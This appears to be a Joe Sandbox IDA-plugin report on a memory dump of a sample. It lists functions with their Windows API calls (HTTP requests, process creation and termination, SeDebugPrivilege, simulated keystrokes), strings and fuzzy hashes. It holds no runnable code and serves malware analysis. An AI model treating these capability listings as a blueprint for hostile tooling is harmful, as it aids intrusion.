Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
Instruction ID: b9672c3b2f85054ac2231a17c2dc1709eb6d603a9d997d4cd833bdebdd6d8308
Opcode Fuzzy Hash: dcaf38347a3a165ce989006a5a84b9a624a43f382487031cc2bbc1312cf6e664
Instruction Fuzzy Hash: 5C71C135901205DFCF61CF64C884AEA7FB5FF88360F14427AED5A9A2A6D731C891DB60

Function 00A81A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A81A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A81A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00A81ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A81AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A81AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00A81B10
InternetCloseHandle.WININET(00000000), ref: 00A81B57

Part of subcall function 00A82483: GetLastError.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A82498
Part of subcall function 00A82483: SetEvent.KERNEL32(?,?,00A81817,00000000,00000000,00000001), ref: 00A824AD

Strings

, xrefs: 00A81B01

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
Instruction ID: aeec4ef480ae0fefde3a0248a0f01d78095d0fab8779e24f3ccc0d90940a6e8f
Opcode Fuzzy Hash: 6cc6c19b3b5bcbe8205b36220d2f94b8a47856c14a2c4bc1a74a8bbf9481ef2c
Instruction Fuzzy Hash: 464151B1601219BFEB15AF90CC89FFB7BACFF08354F004126F9059A141EB749E569BA0

Function 00A88C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A9F910), ref: 00A88D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A9F910), ref: 00A88D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00A88ED6
SysFreeString.OLEAUT32(?), ref: 00A88F00

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
Instruction ID: 20c0f49d920591360d34f2fc9aaf9c1fe96193b0696e28089b25a04c970ac056
Opcode Fuzzy Hash: 256558fc720db08bfcaa7cdf38dc7f4a112df556fc4043af96c93d194cbcba66
Instruction Fuzzy Hash: 24F11971A00209EFDF14EF94C884EAEB7B9FF49314F148498F905AB251DB35AE46CB51

Function 00A8F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A8F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A8F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A8FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00A8FA7C
CloseHandle.KERNEL32(?), ref: 00A8FAAB
CloseHandle.KERNEL32(?), ref: 00A8FB22

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: f74858c9314a2006a0b3f929728d587347a838eacd118dee45f566871477dbc7
Instruction ID: f5919a38f0029aa97f9de983c5131ebc64a71ddf60039b520375ebdabbc8e506
Opcode Fuzzy Hash: f74858c9314a2006a0b3f929728d587347a838eacd118dee45f566871477dbc7
Instruction Fuzzy Hash: ACE1CF31604301AFDB14EF24C991B6ABBE5EF85354F14896DF8999B2A2CB31EC41CB52

Function 00A74CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A73697,?), ref: 00A7468B

Part of subcall function 00A7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A73697,?), ref: 00A746A4

Part of subcall function 00A74A31: GetFileAttributesW.KERNEL32(?,00A7370B), ref: 00A74A32

lstrcmpiW.KERNEL32(?,?), ref: 00A74D40
_wcscmp.LIBCMT ref: 00A74D5A
MoveFileW.KERNEL32(?,?), ref: 00A74D75

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
Instruction ID: 17a1bebd542146c7d818361a80f365eb352e4305ad92cb74855a15416fc0cfc8
Opcode Fuzzy Hash: 8a0ed293621737558b03f3a2e19c14869f3a8d1f183e91289c065e59bf163a49
Instruction Fuzzy Hash: 805164B25083459BC724DBA0DD819DFB3ECAF88350F40892EF689D3152EF34A588C766

Function 00A98645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A986FF

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
Instruction ID: 59f6dc488658bbc7a09cc0cd0c455abe1ba9c2550447463bbbfd0b5df3c1e803
Opcode Fuzzy Hash: aee42792f1910ae9a30c9c2f9ec650731322edfb3192a7c8513ea1e1894243df
Instruction Fuzzy Hash: 77519030700244BEEF209F68CC89FAD7BE5EB06760F604116FA51EA1A1CF79E990DB50

Function 00A12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A4C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A4C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A4C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A4C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A4C370
DestroyIcon.USER32(00000000), ref: 00A4C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A4C39C
DestroyIcon.USER32(?), ref: 00A4C3AB

Part of subcall function 00A9A4AF: DeleteObject.GDI32(00000000), ref: 00A9A4E8

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
Instruction ID: 4b75924ddda70174eafb452e32f3ce58e3ba1a181f90630aab52e8a2193b19ed
Opcode Fuzzy Hash: 75b0591a2406aa11cc6f084258bd982b59e1fcadb9c401a1132171c982cd9b90
Instruction Fuzzy Hash: 82515A74A05209AFDB20DF64CC45FAA77B5EB58321F104529F906DB290DBB0EDA1EB90

Function 00A6966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A6A84C
Part of subcall function 00A6A82C: GetCurrentThreadId.KERNEL32 ref: 00A6A853
Part of subcall function 00A6A82C: AttachThreadInput.USER32(00000000,?,00A69683,?,00000001), ref: 00A6A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00A6968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A696AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00A696AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A696D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A696E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A696F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00A696FB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
Instruction ID: 8e5518840fddc0a98a32a74eb38c1b38dde55e6ab6245a53896b407dd6a7b743
Opcode Fuzzy Hash: 01d6324d6b6a337b8deb8e33c9b63c6cd08803c71a911055ddf35b0574f2c19a
Instruction Fuzzy Hash: D111A571A50618BEF610AFA0DC49F6A7B2DDB4C751F210426F344EB0A1CDF25C51DAE4

Function 00A68921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A6853C,00000B00,?,?), ref: 00A6892A
HeapAlloc.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68946
GetCurrentProcess.KERNEL32(?,00000000,?,00A6853C,00000B00,?,?), ref: 00A6894E
DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A68951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A6853C,00000B00,?,?), ref: 00A68961
GetCurrentProcess.KERNEL32(00A6853C,00000000,?,00A6853C,00000B00,?,?), ref: 00A68969
DuplicateHandle.KERNEL32(00000000,?,00A6853C,00000B00,?,?), ref: 00A6896C
CreateThread.KERNEL32(00000000,00000000,00A68992,00000000,00000000,00000000), ref: 00A68986

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
Instruction ID: ce75455bbbc6ec68facd44359ca3170d355941cd8dadfbfa2439e8b2e1054b35
Opcode Fuzzy Hash: 66266c02caa5479419734f5770831becf250543f70042cbca92fbf915903e40a
Instruction Fuzzy Hash: A401A8B5340308FFEA10EBA5DC49F6B3BACEB89711F508522FB05DB1A1CA7498018A64

Function 00A89B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00A89BA4, 00A89EC8
Not an Object type, xrefs: 00A89B7B

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: d20bad388b746ee1bbb8fd04dbf9a71f869bf3a5329f987b8e4b708008c69089
Instruction ID: 172883ce6023e519751eafc0d9ceaaf50174efe83b1493d5c89fdc7f796a56eb
Opcode Fuzzy Hash: d20bad388b746ee1bbb8fd04dbf9a71f869bf3a5329f987b8e4b708008c69089
Instruction Fuzzy Hash: 90C17171A002199FDF10EFA8D984BBFB7F5FB48354F188469E905AB280E7719D45CB90

Function 00A89113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A89167
VariantInit.OLEAUT32(?), ref: 00A89238
VariantInit.OLEAUT32(?), ref: 00A89339
VariantClear.OLEAUT32(?), ref: 00A89343
VariantClear.OLEAUT32(?), ref: 00A893A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00A8931C
Null Object assignment in FOR..IN loop, xrefs: 00A891C8, 00A892F6, 00A893AE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 986ea88c29bc0659006ef7868957e17b51147d6361b615e6e75fd4ccab8655f4
Instruction ID: 913aeb16ae5bfd1c808f1877236aab283c8981618316f6ee4ecfe3c058c238de
Opcode Fuzzy Hash: 986ea88c29bc0659006ef7868957e17b51147d6361b615e6e75fd4ccab8655f4
Instruction Fuzzy Hash: 06918B71A00219ABDF24EFA5C848FEFBBB8EF85710F14855DF515AB280D7709945CBA0

Function 00A8975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00A6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?,?,00A67455), ref: 00A67127
Part of subcall function 00A6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67142
Part of subcall function 00A6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?,?), ref: 00A67150
Part of subcall function 00A6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A67044,80070057,?), ref: 00A67160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A89806
_memset.LIBCMT ref: 00A89813
_memset.LIBCMT ref: 00A89956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A89982
CoTaskMemFree.OLE32(?), ref: 00A8998D

Strings

NULL Pointer assignment, xrefs: 00A899DB

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: fca69ed7c218d3a365c085ef55093a4b9e10202ff8bd79542ceefe5d76f74b6a
Instruction ID: 19bed931f3508a149fc159afc112f24eb6497156b5f389485f487d225e6b8781
Opcode Fuzzy Hash: fca69ed7c218d3a365c085ef55093a4b9e10202ff8bd79542ceefe5d76f74b6a
Instruction Fuzzy Hash: 80913871D00229EBDB10EFA4DD84EEEBBB9BF08350F10415AF419A7291DB719A45CFA0

Function 00A96D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A96E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A96E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A96E52
_wcscat.LIBCMT ref: 00A96EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A96EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A96EF2

Strings

SysListView32, xrefs: 00A96DF6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
Instruction ID: 10721924e1a63bcae014e737fe8375cb53fb598beb121a81852a84bd796c858d
Opcode Fuzzy Hash: 7ede6b6b0de1f188588cdd3f4ff02664cd335d3e3891f9dcf2f03e925d59d515
Instruction Fuzzy Hash: 58419E75B00348AFEF21DFA4CC85BEAB7E8EF08350F10082AF595E7291D6719D858B60

Function 00A8E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00A73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00A73C7A
Part of subcall function 00A73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00A73C88
Part of subcall function 00A73C55: CloseHandle.KERNEL32(00000000), ref: 00A73D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9A4
GetLastError.KERNEL32 ref: 00A8E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A8E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A8EA63
GetLastError.KERNEL32(00000000), ref: 00A8EA6E
CloseHandle.KERNEL32(00000000), ref: 00A8EAA3

Strings

SeDebugPrivilege, xrefs: 00A8E9C2

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
